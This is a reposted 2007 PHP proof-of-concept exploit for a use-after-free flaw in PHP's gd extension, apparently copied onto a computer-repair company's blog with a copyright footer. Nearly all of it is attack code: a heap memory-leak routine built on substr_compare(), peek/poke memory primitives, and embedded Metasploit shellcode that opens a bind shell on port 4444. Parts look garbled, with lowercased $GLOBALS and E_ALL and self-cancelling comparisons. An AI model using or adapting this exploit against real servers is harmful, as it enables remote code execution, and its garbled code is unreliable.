PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resourc

    ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         proof of concept code from the hardened-php project        //
  //                   (c) copyright 2007 stefan esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //             php gd already freed resource usage exploit            //
  ////////////////////////////////////////////////////////////////////////
  // this is meant as a protection against remote file inclusion.
  die("remove this line");
  // linux x86 bindshell on port 4444 from metasploit
  $shellcode = "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
  "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
  "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
  "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
  "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
  "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
  "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
  // offsets used for the overwrite (will be overwritten by findoffsets()
  $offset_1 = 0x55555555;
  $offset_2 = 0x66666666;
  findoffsets(); // comment out if you want to just test the crash
  class dummyclass { }
  function myerrorhandler()
  {
  imagedestroy($globals['img']);
  // clipping
  $globals['x'] = str_repeat(chr(0), 7311);
  $globals['x'][7310] = chr(0x00);
  $globals['x'][7309] = chr(0x01);
  $globals['x'][7308] = chr(0x00);
  $globals['x'][7307] = chr(0x7f);
  $globals['x'][7306] = chr(0xff);
  $globals['x'][7305] = chr(0xff);
  $globals['x'][7304] = chr(0xff);
  $globals['x'][7303] = chr(0);
  $globals['x'][7302] = chr(0);
  $globals['x'][7301] = chr(0);
  $globals['x'][7300] = chr(0);
  $globals['x'][7299] = chr(0x80);
  $globals['x'][7298] = chr(0);
  $globals['x'][7297] = chr(0);
  $globals['x'][7296] = chr(0);
  // true color image
  $globals['x'][0x1c38] = chr(1);
  // true color pixelmap (1st entry must be 0)
  $globals['x'][0x1c3c] = chr(0x08);
  $globals['x'][0x1c3d] = chr(0x80);
  $globals['x'][0x1c3e] = chr(0x04);
  $globals['x'][0x1c3f] = chr(0x08);
  return true;
  }
  function poke($addr, $value)
  {
  $globals['img'] = imagecreate(1, 1);
  imagesetpixel($globals['img'], $addr >> 2, new dummyclass(), $value);
  }
  function peek($addr)
  {
  $globals['img'] = imagecreate(1, 1);
  return imagecolorat($globals['img'], $addr >> 2, new dummyclass());
  }
  printf("using offsets %08x and %08x\n", $offset_1, $offset_2);
  error_reporting(e_all);
  set_error_handler("myerrorhandler");
  poke($offset_2, $offset_1);
  unset($d);
  // this function uses the substr_compare() vulnerability
  // to get the offsets.
  function findoffsets()
  {
  global $offset_1, $offset_2, $shellcode;
  // we need to not clear these variables,
  //  otherwise the heap is too segmented
  global $memdump, $d, $arr;
  $sizeofhashtable = 39;
  $maxlong = 0x7fffffff;
  // signature of a big endian hashtable of size 256 with 1 element
  $search = "\x00\x01\x00\x00\xff\x00\x00\x00\x01\x00\x00\x00";
  $memdump = str_repeat("a", 18192);
  for ($i=0; $i<400; $i++) {
  $d[$i]=array();
  }
  unset($d[350]);
  $x = str_repeat("\x01", $sizeofhashtable);
  unset($d[351]);
  unset($d[352]);
  $arr = array();
  for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
  $arr[$shellcode] = 1;
  for ($i=0; $i<129; $i++) { unset($arr[$i]); }
  // if the libc memcmp leaks the information use it
  // otherwise we only get a case insensitive memdump
  $b = substr_compare(chr(65),chr(0),0,1,false) != 65;
  for ($i=0; $i<18192; $i++) {
  $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
  $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
  if ($y-$y == 1 || $y-$y==1){
  $y = chr($y);
  if ($b && strtoupper($y)!=$y) {
  if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
  $y = strtoupper($y);
  }
  }
  $memdump[$i] = $y;
  } else {
  $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
  $y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
  if ($y-$y != 1 && $y-$y!=1){
  $memdump[$i] = chr(1);
  } else {
  $memdump[$i] = chr(0);
  }
  }
  }
  // search shellcode and hashtable and calculate memory address
  $pos_shellcode = strpos($memdump, $shellcode);
  $pos_hashtable = strpos($memdump, $search);
  if ($pos_shellcode == 0 || $pos_hashtable == 0) {
  die ("unable to find offsets");
  }
  $addr = substr($memdump, $pos_hashtable+6*4, 4);
  $addr = unpack("l", $addr);
  // fill in both offsets
  $offset_1 = $addr[1] + 32;
  $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;
  }
  ?>
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：